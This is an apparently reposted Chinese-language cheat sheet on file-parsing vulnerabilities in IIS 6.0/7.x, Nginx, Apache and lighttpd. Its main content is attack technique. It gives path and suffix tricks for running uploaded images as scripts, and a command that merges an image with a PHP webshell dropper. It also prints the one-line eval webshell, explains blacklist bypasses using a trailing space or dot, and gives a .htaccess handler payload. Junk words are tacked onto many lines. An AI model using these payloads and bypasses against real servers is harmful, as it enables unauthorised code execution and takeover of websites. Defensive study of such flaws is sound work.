IIS 6.0/7.0/7.五、Nginx、Apache 等服務器解析漏洞總結

IIS 6.0php


 目錄解析:/xx.asp/xx.jpg xx.jpg可替換爲任意文本文件(e.g. xx.txt),文本內容爲後門代碼html


IIS6.0 會將 xx.jpg 解析爲 asp 文件。shell


後綴解析:/xx.asp;.jpg /xx.asp:.jpg(此處需抓包修改文件名)apache


IIS6.0 都會把此類後綴文件成功解析爲 asp 文件。windows


(站長評論:IIS6.0解析漏洞的成因,能夠查閱羅哥寫的一篇短文:IIS文件名解析漏洞扼要分析)安全


{/xx.asp:.jpg 此類文件在Windows下不容許存在,:.jpg被自動除去,剩下/xx.asp}app


(站長評論:發現錯誤,並非不容許存在,這種路徑叫作「NTFS數據流」,具體見:IIS6使用冒號上傳漏洞,發現IIS6漏洞(上傳利用) 底下的評論)ide


默認解析:/xx.asa /xx.cer /xx.cdxhtm


IIS6.0 默認的可執行文件除了 asp 還包含這三種圖片


(站長評論:這種主要是因爲在 IIS 默認配置中,這幾個後綴默認由 asp.dll 來解析,因此執行權限和 .asp 一摸同樣,你可在配置中自行刪除該後綴,以防止安全隱患)


此處可聯繫利用目錄解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg


[+]IIS 7.0/IIS 7.5/Nginx <=0.8.37


IIS 7.0/IIS 7.5/Nginx <=0.8.37


在默認Fast-CGI開啓情況下,在一個文件路徑(/xx.jpg)後面加上/xx.php會將 /xx.jpg/xx.php 解析爲 php 文件。


經常使用利用方法: 將一張圖和一個寫入後門代碼的文本文件合併 將惡意文本寫入圖片的二進制代碼以後,避免破壞圖片文件頭和尾


e.g. copy xx.jpg/b + yy.txt/a xy.jpg


######################################


/b 即二進制[binary]模式


/a 即ascii模式 xx.jpg正常圖片文件


yy.txt 內容 <?PHP fputs(fopen(‘shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>


意思爲寫入一個內容爲 <?php eval($_POST[cmd])?> 名稱爲shell.php的文件


######################################


找個地方上傳 xy.jpg ,而後找到 xy.jpg 的地址,在地址後加上 /xx.php 便可執行惡意文本。


而後就在圖片目錄下生成一句話*** shell.php 密碼 cmd


[+]Nginx <=0.8.37


在Fast-CGI關閉的狀況下,Nginx <=0.8.37 依然存在解析漏洞


在一個文件路徑(/xx.jpg)後面加上%00.php會將 /xx.jpg%00.php 解析爲 php 文件。


(站長評論:從 /test.jpg/x.php 演變過來的,具體能夠參考:Ngnix 空字節可遠程執行代碼漏洞)


[+]Apache


後綴解析:test.php.x1.x2.x3


Apache將從右至左開始判斷後綴,若x3非可識別後綴,再判斷x2,直到找到可識別後綴爲止,而後將該可識別後綴進解析


test.php.x1.x2.x3 則會被解析爲php


經驗之談:php|php3|phtml 多可被Apache解析


(站長評論:關於 apache 解析漏洞能夠查閱「Apache 漏洞以後綴名解析漏洞」)


[+]其餘一些可利用的


在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不容許存在的,若這樣命名,windows會默認除去空格或點,這也是能夠被利用的!


在向一臺windows主機上傳數據時,你能夠抓包修改文件名,在後面加個空格或點,試圖繞過黑名單,若上傳成功,最後的點或空格都會被消除,這樣就可獲得shell。


我記得Fck Php 2.6就存在加空格繞過的漏洞。{Linux主機中不行,Linux容許這類文件存在}


若是在Apache中.htaccess可被應用(Apache的配置文件httpd.conf中對目錄的AllowOverride設置爲All時,apache會應用目錄下.htaccess中的配置 By sfasfas),


且能夠被上傳,那能夠嘗試在.htaccess中寫入:


<FilesMatch 「shell.jpg」> SetHandler application/x-httpd-php </FilesMatch>


shell.jpg換成你上傳的文件,這樣shell.jpg就可解析爲php文件


[+]lighttpd


xx.jpg/xx.php


[Add by El4pse]

相關文章
相關標籤/搜索